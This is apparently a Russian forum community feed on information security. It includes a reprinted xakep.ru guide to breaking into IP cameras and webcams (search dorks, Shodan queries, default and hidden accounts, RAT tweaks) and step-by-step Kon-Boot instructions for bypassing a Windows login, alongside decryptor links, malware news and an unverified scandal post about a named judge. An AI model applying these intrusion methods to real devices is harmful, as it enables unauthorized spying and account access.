Сообщество - Информационная безопасность
Информационная безопасность
838 постов 18 121 подписчик
1338

Полмиллиона пользователей Android скачали опасный вирус

Полмиллиона пользователей Android скачали опасный вирус Android, Вирус

Эксперты в области кибербезопасности обнаружили в магазине Google Play 13 поддельных приложений, замаскированных под оригинальные программы. В общей сложности их скачали более 560 тысяч раз, пишет сотрудник компании ESET Лукас Стефанко (Lukas Stefanko) в своем Twitter.


Все вредоносные приложения-игры были опубликованы в магазине от имени разработчика Luis O Pinto. Сразу после установки программы удаляли свою иконку с экрана и запускали загрузку другого приложения в фоновом режиме.


Вторая программа, в свою очередь, маскировалась под сервис Game Center, который сразу же запрашивал разрешение на полный доступ к сети и автозапуску при включении смартфона. После одобрения пользователя троян начинал крутить рекламу на экране каждый раз, когда владелец телефона разблокировал его.


Журналисты The Bleeping Computer отметили, что модераторы Google Play не удалили приложения даже после того, как зараженные пользователи оставили множество отзывов о поддельном ПО. Ситуация изменилась лишь после того, как эксперты обнародовали информацию о вредоносных программах.

450

Хахалева заказала зачистку интернета на несколько миллионов рублей))

Хахалева заказала зачистку интернета на несколько миллионов рублей)) Елена Хахалева, Интернет, Длиннопост

Судья не унимается. По информации chel.pro.site@ya Елена Хахалева обращается за помощью к PR-агентствам и заказывает чистку интернета.


- Елена Владимировна Хахалева оплатила известным и не очень пиар-агентствам более четырех миллионов рублей за удаление из сети наиболее скандальных материалов. Снимали один сайт, остальные злились и мочили втрое сильнее. Вполне вероятно, что скандал бы затих сам собой, но дензнаки легально освоенные судьей Хахалевой за годы неустанной работы во благо родины, никак не кончались. Иногда удаляли по пять тысяч долларов исключительный мусор из серии блога чернушника А. Караулова «Момент Истины» ( материал остался лишь в кэше Гугл)


Нужно отметить, что воспользовавшись связями в крае, судья смогла заставить удалить неугодные статьи газету «Кубанские новости». Хоть тут обошлась без финансовых влияний.


Дальше-больше. Скандал разрастается, как снежный ком. На битву выходят продажные хозяева интернет – пабликов и «приличные» издания.


По данным того же челябинского сайта, пиарщики предложили Хахалевой за 20 миллионов опубликовать положительные статьи о ней. В частности, рассказать, что все предыдущие публикации – попытка надавить на нее. План был таков:


-Договориться с артистами, дабы те вещали направо и налево о своей неподкупности и страсти выступать на свадьбе дочери Хахалевой без единой копейки гонорара.


-Найти 5-7 спикеров, которые выставят мать золотой невесты Елену Хахалеву жертвой черных PR-технологий и, цитируем — массированной информационной атаки против… Путина.


-Разместить сопливые оправдания в сотне изданий для белой выдачи в поисковиках и мифического отбеливания репутации.


Но, когда специально пишешь заказные материалы, часто получается неправдоподобно. Каждый журналист, писавший «на заказ», это знает. Так вышло с газетой «Версия».


Журналисты утверждают, что снять материал с сайта Versia.ru стоит от 2500 до 15 000 долларов, поставить можно за 1000-2000. Естественно, для судьи Хахалевой ценник вырос раз в пять. Получилось у газеты, что «кто-то всемогущий решил заплатить за свадьбу дочурки Елены Владимировны 2 миллиона нерублей с одной лишь целью — «дискредитировать руководство Краснодарского края и даже страны».


Интересно получается. Одни Сми удаляют публикации, а другие- находят все новые «черные дыры» в биографии Елены Хахалевой. И муж у нее обанкротился, диплом не значится в архивах университета, имущества нашли на 500 миллионов.


http://zergulio.livejournal.com/5131595.html?utm_source=twsh...

Показать полностью
2210

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься.

UPD: #comment_128715038

@Xpert77: Был когда-то пост с подробным описанием получения доступа

---------------


Удаленный доступ к веб-камерам и камерам наблюдения — самая наглядная практика взлома. Она не требует спецсофта, позволяя обойтись только браузером и нехитрыми манипуляциями. Тысячи цифровых глаз по всему миру станут доступны, если ты умеешь находить их IP-адреса и уязвимости.


WARNING

Статья носит исследовательский характер. Она адресована специалистам по безопасности и тем, кто собирается ими стать. При ее написании использовались общедоступные базы данных.

С широко закрытыми глазами


Видеонаблюдение используется преимущественно для охраны, а потому не жди веселых картинок с первой же хакнутой камеры. Может, тебе и посчастливится быстро найти HD-трансляцию из элитного борделя, но чаще будут попадаться скучные виды на безлюдные склады и парковки с разрешением VGA. Если в кадре и есть люди, то в основном это ждуны в холле и жруны в кафе. Куда интереснее наблюдать за самими операторами и работой всяких роботов.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

IP-камеры и веб-камеры часто путают, хотя это принципиально разные устройства. Сетевая камера, или IP-камера, — самодостаточное средство наблюдения. Она управляется через веб-интерфейс и самостоятельно передает видеопоток по сети. По сути, это микрокомпьютер со своей ОС на базе Linux. Сетевой интерфейс Ethernet (RJ-45) или Wi-Fi позволяет выполнять прямое подключение к IP-камере. Раньше для этого использовались фирменные клиентские приложения, но большинство современных камер управляются через браузер с любого устройства — хоть с компа, хоть со смартфона. Как правило, IP-камеры включены постоянно и доступны удаленно. Именно этим и пользуются хакеры.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Веб-камера — пассивное устройство, которым управляют локально с компьютера (по USB) или ноутбука (если она встроенная) через драйвер операционной системы. Этот драйвер может быть двух разных типов: универсальный (предустановленный в ОС и подходящий для многих камер разных производителей) и написанный на заказ для конкретной модели. Задача хакера здесь уже другая: не подключиться к веб-камере, а перехватить ее видеопоток, который она транслирует через драйвер. У веб-камеры нет отдельного IP-адреса и встроенного веб-сервера. Поэтому взлом веб-камеры всегда следствие взлома компьютера, к которому она подключена. Давай пока отложим теорию и немного попрактикуемся.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Взлом камер наблюдения


Взлом IP-камер вовсе не говорит о том, что кто-то хозяйничает на компьютере, с которого владелец смотрит их видеопоток. Просто теперь он смотрит его не один. Это отдельные и довольно легкие цели, однако подводных камней на пути к ним хватает.


WARNING

Подглядывание через камеры может повлечь административное и уголовное наказание. Обычно назначают штраф, но не всем удается легко отделаться. Мэттью Андерсон отсидел полтора года за взлом веб-камер с помощью трояна. Повторившему его подвиг присудили уже четыре года.

Во-первых, удаленный доступ к выбранной камере может поддерживаться только через какой-то конкретный браузер. Одним подавай свежий Chrome или Firefox, а другие работают только со старым IE. Во-вторых, видеопоток транслируется в интернет в разных форматах. Где-то для его просмотра нужно будет установить плагин VLC, другие камеры потребуют Flash Player, а третьи не покажут ничего без старой версии Java или собственного плагина.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Иногда встречаются нетривиальные решения. Например, Raspberry Pi превращают в сервер видеонаблюдения с nginx и транслируют видео по RTMP.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

По замыслу, IP-камеру защищают от вторжения два секрета: ее IP-адрес и пароль учетной записи. На практике IP-адреса вряд ли можно назвать секретом. Они легко обнаруживаются по стандартным адресам, к тому же камеры одинаково откликаются на запросы поисковых роботов. Например, на следующем скриншоте видно, что владелец камеры отключил анонимный доступ к ней и добавил ввод CAPTCHA для предотвращения автоматизированных атак. Однако по прямой ссылке /index.htm можно изменить их без авторизации.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Уязвимые камеры наблюдения можно отыскать через Google или другой поисковик с помощью продвинутых запросов. Например:


inurl:«wvhttp-01»

inurl:«viewerframe?mode=»

inurl:«videostream.cgi»

inurl:«webcapture»

inurl:«snap.jpg»

inurl:«snapshot.jpg»

inurl:«video.mjpg»

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Куда удобнее искать их через Shodan. Для начала можно ограничиться простым запросом netcam, а затем перейти к более продвинутым: netcam city:Moscow, netcam country:RU, webcamxp geo:55.45,37.37, linux upnp avtech и другим. Подробнее об использовании этого поисковика читай в статье журнала 194 выпуска «Белая шляпа для Shodan».

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Прекрасно ищет камеры и Censys. Язык запросов у него чуть сложнее, но разобраться с ним тоже большого труда не составит. Например, запрос 80.http.get.body:"DVR Web Client" покажет камеры, подключенные к IP-видеорегистратору, а metadata.manufacturer:"axis" найдет камеры производства Axis. О том, как работать с Censys, писали в статье журнала Хакер «Что умеет Censys?».

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Еще один шикарный поисковик по «интернету вещей» — ZoomEye. Камеры в нем находятся по запросам device:webcam или device:media device.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Можно искать и по старинке, банально сканируя диапазоны IP-адресов в поисках характерного отклика от камеры. Получить список айпишников определенного города можно на этом веб-сервисе. Там же есть сканер портов на случай, если у тебя до сих пор нет собственного.


В первую очередь нас интересуют порты 8000, 8080 и 8888, поскольку они часто заданы по умолчанию. Узнать дефолтный номер порта для конкретной камеры можно в ее руководстве. Номер практически никогда не меняют. Естественно, на любом порте можно обнаружить и другие сервисы, поэтому результаты поиска придется дополнительно фильтровать.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Узнать модель обнаруженной камеры просто: обычно она указана на титульной странице веб-интерфейса и в ее настройках.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Когда я говорил в начале статьи об управлении камерами через «фирменное клиентское приложение», то имел в виду программы вроде iVMS 4xxx, которая поставляется с камерами Hikvision. На сайте разработчика можно почитать русскоязычный мануал к программе и самим камерам. Если ты найдешь такую камеру, то с большой вероятностью на ней будет стоять заводской пароль, и программа предоставит к ней полный доступ.


С паролями к камерам наблюдения дела вообще обстоят крайне весело. На некоторых камерах пароля просто нет и авторизация отсутствует напрочь. На других стоит заданный по умолчанию пароль, который легко найти в мануале к камере. На сайте ipvm.com опубликован список самых часто встречающихся логинов и паролей, установленных на разные модели камер.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Часто бывает, что производитель оставил в прошивке камеры служебный вход для сервис-центров. Он остается открытым даже после того, как владелец камеры сменил дефолтный пароль. В мануале его уже не прочтешь, а вот найти на тематических форумах можно.


Огромная проблема состоит в том, что во многих камерах используется один и тот же веб-сервер GoAhead. В нем есть несколько известных уязвимостей, которые производители камер не спешат патчить.


GoAhead, в частности, подвержен переполнению стека, которое можно вызывать простым запросом HTTP GET. Ситуация усложняется еще и тем, что китайские производители модифицируют GoAhead в своих прошивках, добавляя новые дыры.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

На сегодняшний день больше миллиона IP-камер и IP-видеорегистраторов разных производителей позволяют удаленно получить доступ к их настройкам безо всякой авторизации. Скрипт на Python, автоматизирующий атаку на уязвимые устройства, уже выложен на GitHub. Проблема была обнаружена в начале 2017 года при реверсинге прошивок DVR производства Dahua Technology. Чуть позже выяснилось, что она затрагивает более тысячи моделей разных производителей. Они просто тиражировали ошибки друг друга. Автор обещал дать время на исправление и пока не раскрывать всех деталей, но он готов поделиться ими приватно по email со всеми специалистами по безопасности. Если у тебя есть сертификат CEH (Certified Ethical Hacker) или аналогичный — можешь попробовать.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

В коде других прошивок встречаются такие ляпы, как кривые условные переходы. Такая камера открывает доступ, если ввести неправильный пароль или просто нажать кнопку «Отмена» несколько раз. Во время нашего исследования мне попалось более десятка таких камер. Так что, если ты устал перебирать дефолтные пароли, попробуй кликнуть Cancel — есть шанс внезапно получить доступ.


Камеры среднего и высокого класса оснащают поворотными креплениями. Взломав такую, можно сменить ракурс и полноценно осмотреть все вокруг. Особенно занятно бывает играть в перетягивание камеры, когда, помимо тебя, ей одновременно пытается управлять кто-то еще. В общем случае атакующий получает полное управление камерой прямо из своего браузера, просто обратившись по нужному адресу.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Когда говорят о тысячах уязвимых камер, хочется подробнее разобрать хотя бы одну. Предлагаю начать с популярного производителя Foscam. Помнишь, я говорил про служебные входы? Так вот у камер Foscam и многих других они есть. Помимо встроенной учетки admin, пароль к которой рекомендуется задать при первом включении камеры, есть еще один аккаунт — operator. Его пароль по умолчанию пустой, и его редко кто догадывается сменить.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Кроме того, у камер Foscam очень узнаваемые адреса из-за шаблонной регистрации. В общем случае он выглядит как xxxxxx.myfoscam.org:88, где первые два xx — буквы латиницы, а последующие четыре — порядковый номер в десятичном формате.


Если камера подключена к IP-видеорегистратору, то можно не только удаленно наблюдать в реальном времени, но и просмотреть прежние записи.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Как устроен детектор движения


Профессиональные камеры наблюдения оснащены дополнительным датчиком — детектором движения, который работает даже в полной темноте благодаря ИК-приемнику. Это интереснее постоянно включенной ИК-подсветки, так как не демаскирует камеру и позволяет ей вести скрытое наблюдение. Люди всегда светятся в ближнем ИК-диапазоне (по крайней мере — живые). Как только сенсор зафиксирует движение, контроллер включает запись. Если фотоэлемент сигнализирует о низкой освещенности, дополнительно включается подсветка. Причем точно в момент записи, когда уже поздно закрываться от объектива.


Дешевые камеры устроены проще. У них нет отдельного датчика движения, а вместо него используется сравнение кадров с самой веб-камеры. Если картинка отличается от предыдущей, значит, в кадре что-то изменилось и надо это записать. Если движение не зафиксировано, то серия кадров просто удаляется. Это экономит место, трафик и время на последующую перемотку видео. Большинство детекторов движения настраиваются. Можно задать порог срабатывания, чтобы не протоколировать любое шевеление перед камерой, и настроить дополнительные оповещения. Например, отправлять СМС и последнюю фотку с камеры сразу на смартфон.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Программный детектор движения сильно уступает аппаратному и часто становится причиной казусов. В ходе своих изысканий я наткнулся на две камеры, которые непрерывно слали алерты и записывали гигабайты «компромата». Все тревоги оказались ложными. Первая камера была установлена снаружи какого-то склада. Она заросла паутиной, которая дрожала на ветру и сводила детектор движения с ума. Вторая камера была расположена в офисе напротив мигающего огоньками роутера. В обоих случаях порог срабатывания был слишком низким.


Взлом веб-камер


Веб-камеры, которые работают через универсальный драйвер, часто называют UVC-совместимыми (от USB Video Class — UVC). Взломать UVC-камеру проще, поскольку она использует стандартный и хорошо задокументированный протокол. Однако в любом случае для доступа к веб-камере атакующему придется сначала получить контроль над компьютером, к которому она подключена.


Технически доступ к веб-камерам на компьютерах с Windows любой версии и разрядности осуществляется через драйвер камеры, фильтры DirectDraw и кодеки VFW. Однако начинающему хакеру не требуется вникать во все эти детали, если он не собирается писать продвинутый бэкдор. Достаточно взять любую «крысу» (RAT — Remote Admin Tool) и слегка модифицировать ее. Средств удаленного администрирования сегодня просто уйма. Кроме отборных бэкдоров с VX Heaven, есть и вполне законные утилиты, вроде Ammyy Admin, LiteManager, LuminosityLink, Team Viewer или Radmin. Все, что опционально требуется изменить в них, — это настроить автоматический прием запросов на удаленное подключение и сворачивание главного окна. Дальше дело за методами социального инжиниринга.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Кодомодифицированная крыса загружается жертвой по фишинговой ссылке или проползает на ее компьютер сама через первую обнаруженную дыру. О том, как это автоматизировали взломащики читать в статье «Gophish — фреймворк для фишинга». Кстати, будь осторожен: большинство ссылок на «программы для взлома камер» сами фишинговые и могут привести тебя к скачиванию малвари.


У рядового пользователя большую часть времени веб-камера неактивна. Обычно о ее включении предупреждает светодиод, но даже с таким оповещением можно выполнять скрытое наблюдение. Как оказалось, индикацию активности веб-камеры можно отключить в том случае, если питание светодиода и CMOS-матрицы физически не взаимосвязано. Это уже проделывали с веб-камерами iSight, встроенными в MacBook. Исследователи Брокер и Чекоуэй из университета Джона Хопкинса написали утилиту iSeeYou, которая запускается от простого пользователя и, эксплуатируя уязвимость контроллера Cypress, подменяет его прошивку. После запуска жертвой iSeeYou атакующий получает возможность включать камеру, не зажигая ее индикатор активности.


Уязвимости регулярно находят и в других микроконтроллерах. Специалист компании Prevx собрал целую коллекцию таких эксплоитов и показал примеры их использования. Практически все найденные уязвимости относились к 0day, но среди них были и давно известные, которые производители просто не собирались устранять.


Способов доставить эксплоиты становится все больше, а отловить их все труднее. Антивирусы часто пасуют перед модифицированными файлами PDF, имеют предустановленные ограничения на проверку больших файлов и не могут проверить зашифрованные компоненты малвари. Более того, полиморфизм или постоянная перекомпиляция боевой нагрузки стала нормой, поэтому сигнатурный анализ давно отошел на второй план. Внедрить троян, открывающий удаленный доступ к веб-камере, сегодня стало исключительно просто. Это одна из популярных забав среди троллей и script kiddies.


Превращаем вебку в камеру наблюдения


Любую веб-камеру можно превратить в подобие IP-камеры, если установить на подключенном к ней устройстве сервер видеонаблюдения. На компьютерах многие используют для этих целей старый webcamXP, чуть более новый webcam 7 и подобные программы.


Для смартфонов есть аналогичный софт — например, Salient Eye. Эта программа умеет сохранять видео в облачный хостинг, освобождая локальную память смартфона. Однако дыр в таких программах и самих ОС хватает, поэтому взломать управляемые ими веб-камеры часто оказывается не сложнее, чем IP-камеры с дырявой прошивкой.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Смартфон как средство наблюдения


В последнее время старые смартфоны и планшеты нередко приспосабливают для домашнего видеонаблюдения. Чаще всего на них ставят Android Webcam Server — простое приложение, которое транслирует видеопоток со встроенной камеры в интернет. Оно принимает запросы на порт 8080 и открывает панель управления на странице с говорящим названием /remote.html. Попав на нее, можно менять настройки камеры и смотреть изображение прямо в окне браузера (со звуком или без).


Обычно такие смартфоны показывают довольно унылые картины. Вряд ли тебе интересно смотреть на спящего пса или на припаркованную возле дома машину. Однако Android Webcam Server и аналогичные приложения можно использовать иначе. Помимо тыловой камеры, у смартфонов есть и фронтальная. Почему бы нам не включить ее? Тогда мы увидим другую сторону жизни владельца смартфона.

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Защита от подглядывания


Первое, что приходит на ум большинству людей после демонстрации легкого взлома камер, — это заклеивать их изолентой. Владельцы веб-камер со шторкой считают, что их проблема подглядывания не касается, и зря. Возможно еще и подслушивание, поскольку, кроме объектива, у камер есть микрофон.


Разработчики антивирусов и других комплексов программной защиты используют путаницу в терминологии для продвижения своих продуктов. Они пугают статистикой взлома камер (которая действительно впечатляет, если в нее включить IP-камеры), а сами предлагают решение для контроля доступа к веб-камерам, причем технически ограниченное.


Защиту IP-камер можно повысить простыми средствами: обновив прошивку, сменив пароль, порт и отключив учетные записи по умолчанию, а также включив фильтрацию IP-адресов. Однако этого мало. Многие прошивки имеют неустраненные ошибки, которые позволяют получить доступ безо всякой авторизации — например, по стандартному адресу веб-страницы с LiveView или панели настроек. Когда находишь очередную дырявую прошивку, так и хочется ее обновить удаленно!

Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься. Наблюдение, Видеонаблюдение, Взлом, Подглядывание, Фишинг, Длиннопост, Хакеры

Взлом веб-камеры — совсем другое дело. Это всегда верхушка айсберга. Обычно к тому времени, когда атакующий получил к ней доступ, он уже успел порезвиться на локальных дисках, украсть учетки всех аккаунтов или сделать компьютер частью ботнета.


Тот же Kaspersky Internet Security предотвращает несанкционированный доступ только к видеопотоку веб-камеры. Он не помешает хакеру изменить ее настройки или включить микрофон. Список защищаемых им моделей официально ограничивается веб-камерами Microsoft и Logitech. Поэтому функцию «защита веб-камеры» стоит воспринимать лишь как дополнение.


Подглядывающие сайты


Отдельная проблема — атаки, связанные с реализацией управления доступом к камере в браузерах. Многие сайты предлагают сервисы общения с использованием камеры, поэтому запросы доступа к ней и ее встроенному микрофону всплывают в браузере по десять раз на день. Особенность здесь в том, что на сайте может использоваться скрипт, который открывает pop-under (дополнительное окно в фоне). Этому дочернему окну передаются разрешения родительского. Когда ты закрываешь основную страницу, микрофон остается включенным на фоновой. Из-за этого возможен сценарий, при котором пользователь думает, что закончил разговор, а на деле собеседник (или кто-то еще) продолжает его слышать.


В большинстве браузеров разрешения хранятся постоянно, поэтому при следующем посещении сайта тебя могут видеть и слышать уже без предупреждения. Стоит почаще проверять разрешения доступа к веб-камере и ее микрофону для разных сайтов. В Google Chrome это можно сделать на странице настроек chrome://settings/contentExceptions#media-stream. В старых версиях Firefox аналогичные настройки были на странице about:permissions, а в новых они задаются отдельно для каждого сайта при клике на иконку (i) слева в адресной строке. Подробнее смотри в документации Mozilla.


(с) xakep.ru

Показать полностью 23
5078

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция]

Дисклеймер: данная статься создана исключительно в ознакомительных целях и не побуждает к действиям. Автор статьи не имеют никакого отношения к разработчику ПО, представленного в данной статье.


В прошлом моём посте о сбросе паролей учетных записей Windows и утилиты SysKey в комментариях товарищ @pfsenses подсказал, что существует такой продукт, как Kon-Boot for Windows. О нём я сегодня и расскажу.

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция] Windows, Безопасность, Пароль, Взлом, IT, Гифка, Длиннопост

Kon-Boot - программный продукт, который изменяет содержимой ядра Windows во время загрузки системы, обходя авторизацию Windows. Таким образом, данная программа позволяет зайти в защищённую учётную запись без пароля. Пароль при этом не изменяется и не сбрасывается. При следующей нормальной загрузке Windows содержимое ядра восстанавливается и система вновь просит пароль для доступа в учётную запись. Kon-Boot может быть загружен через CD-диск или USB-устройство. Загружается через BIOS, аналогично, например, установщику Windows и другим подобным программам.



Поддерживает следующие версии Windows: XP (начиная с SP2), Vista, 7, 8 (8.1), 10, а также Windows Server 2003 и Windows Server 2008.

Для удобности добавил в архив портативную версию UltraISO и отдельно в папку скопировать ISO образ Kon-Boot.


==========================


(1) ЗАПИСЬ KON-BOOT НА USB-НАКОПИТЕЛЬ


Инструкция проще некуда. Для начала необходимо записать образ на флешку, либо диск. Это можно сделать с помощью встроенного установщика, он находится в папке "Установщик Kon-Boot". Но я рассмотрю универсальный метод записи на флешку (этим же методом записываются любые ISO образы на флешку, даже установщики Windows), так как он мне привычнее и удобнее. Просто не люблю использовать сторонние установщики.


1. Открываем UltraISO.exe из папки "UltraISO Portable"

2. Заходим в меню "Файл" > "Открыть..." и выбираем ISO образ "kon-bootCD.iso" из папки "ISO образ отдельно"


В верхней части программы UltraISO или если вы откроете архивом сам ISO образ, вы можете увидеть, что образ пустой. Это не так, просто некоторые архиваторы и программы не видят BOOT-область в образе. Если вы его откроете 7-zip'ом, то увидите папку [BOOT]. Так что не пугайтесь.


3. Далее в меню "Самозагрузка" выбираем пункт "Записать образ Жёсткого диска..."

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция] Windows, Безопасность, Пароль, Взлом, IT, Гифка, Длиннопост

4. Тут мы выбираем нужную нам флешку, при необходимости форматируем (кнопка "Форматировать") и нажимаем кнопку "Записать"

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция] Windows, Безопасность, Пароль, Взлом, IT, Гифка, Длиннопост

5. На следующий вопрос отвечаем "Да"

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция] Windows, Безопасность, Пароль, Взлом, IT, Гифка, Длиннопост

6. Через некоторый промежуток времени образ запишется на флешку и она будет полностью готова к использованию.


==========================


(2) ИСПОЛЬЗОВАНИЕ KON-BOOT


Тут ещё проще. Вставляете флешку и в приоритете запуска BIOS выставляете USB-накопитель. Это делается через настройки BIOS, либо дополнительное меню приоритетности устройств. Как это сделать именно на вашей материнской карте можете найти в Интернете.


Далее вы увидите на экране надпись Kon-Boot и после этого начнётся загрузка Windows.

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция] Windows, Безопасность, Пароль, Взлом, IT, Гифка, Длиннопост

На стадии ввода пароля просто оставьте поле пустым, либо можете написать случайные символы. Windows примет их как за правильный пароль и пропустит в систему.

Незаметный обход пароля Windows без его смены или сброса [Подробная инструкция] Windows, Безопасность, Пароль, Взлом, IT, Гифка, Длиннопост
Показать полностью 5
3538

Дешифровщиков Вам в ленту (WannaCry, Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt)

Дешифровщиков Вам в ленту (WannaCry, Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt) Wannacry, Wanakey, Wanakiwi, Расшифровка, Вирус

Дешифровщик WannaKey под Windows XP от Adrien Guinet: https://github'com/aguinet/wannakey

Подтверждение экспертов: https://www.wired.com/2017/05/wannacry-flaw-help-windows-xp-...

Дешифровщиков Вам в ленту (WannaCry, Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt) Wannacry, Wanakey, Wanakiwi, Расшифровка, Вирус

Дешифровщик wanakiwi под Windows XP,  Windows 7 x86, 2003, Vista, Server 2008 и 2008 R2: https://github'com/gentilkiwi/wanakiwi/releases

Технические детали работы wanakiwi: https://blog.comae.io/wannacry-decrypting-files-with-wanakiw...

Подтверждение эффективности работы wanakiwi специалистами Европола: https://twitter.com/Europol/status/865604532419543041?ref_sr...

ПыСы: Дешифровщики не у всех срабатывают...

Показать полностью 1
2104

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)

Jaff шифрует файлы и добавляет расширения  .jaff, .wlu и .sVn, требует выкуп 1,79 биткоина, то есть порядка $4000.


Через диспетчер задач вырубаем процесс вируса. Как правило произвольное имя процесса. Для примера было SKM_C224e9930.exe

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост

Качаем декриптор с сайта каспера http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhn...


Утилита предложит выбрать зашифрованный файл с расширением .jaff, .wlu или .sVn, далее попросит выбрать текстовый файл с требованием выкупа.

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост
Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост

Утилита просканирует весь компьютер и расшифрует файлы (может занять длительное время).

По завершении сканирования будет такая картина:

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост

Печаль в том что вместе с расшифрованными файлами останутся их зашифрованные копии.

Дополнительная инфа https://www.bleepingcomputer.com/news/security/decrypted-kas...


Ранее о дешифровщиках: http://pikabu.ru/story/spisok_dekriptorov_faylov_posle_zaraz...

Показать полностью 3
1967

В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду

Многие наверняка помнят историю, широко обсуждавшуюся в рунете прошлой зимой. Тогда сотрудник «Лаборатории Касперского» Олег Горобец заметил в метро человека с подозрительным устройством. По мнению специалиста, тот мог сканировать одежду и сумки пассажиров, в надежде поживиться данными о банковских картах с RFID чипами. Хотя тогда большинство участников дискуссии сочли, что Горобец принял за злоумышленника обычного курьера с терминалом оплаты, такой вид мошенничества действительно существует. Так, издание Softpedia сообщает, что группа хакеров The CC Buddies продает в даркнете новый девайс, который способен клонировать 15 банковских карт в секунду с расстояния в восемь сантиметров.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду Длиннопост, Устройство, Хакеры, Даркнет, Продажа, Клоны, Бесконтакная карта, Банковская карта

Популярность такого рода мошенничества растет прямо пропорционально количеству карт с RFID чипами у населения. Похоже, скоро человек, тесно прижимающийся к другим пассажирам в общественном транспорте, будет вызвать мысли вовсе не об извращенцах, а о кардерах.


The CC Buddies назвали свое устройство Contactless Infusion X5 и уверяют, что с ним атакующему даже не придется ни к кому прижиматься – достаточно просто пройти сквозь толпу, к примеру, в подземке или на концерте. Находясь на достаточно близком расстоянии, девайс копирует данные с современных бесконтактных карт и записывает их во внутреннее хранилище. Впоследствии злоумышленник подключит прибор к компьютеру через USB-порт, а специальное приложение, которое The CC Buddies продают в комплекте с устройством, позволит извлечь украденную информацию. Немаловажен и тот факт, что прибор весит всего 70 граммов, а его размеры более чем скромны: 98 x 65 x 12,8 мм.

